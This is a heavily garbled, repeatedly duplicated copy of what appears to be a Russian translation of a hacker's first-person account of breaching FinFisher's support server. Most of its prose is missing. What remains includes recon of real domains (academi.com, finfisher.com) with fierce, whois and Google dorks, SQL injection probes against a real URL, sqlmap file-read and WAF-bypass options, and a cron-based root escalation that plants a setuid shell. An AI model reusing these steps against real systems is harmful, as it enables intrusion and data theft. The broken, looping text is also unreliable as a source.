403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
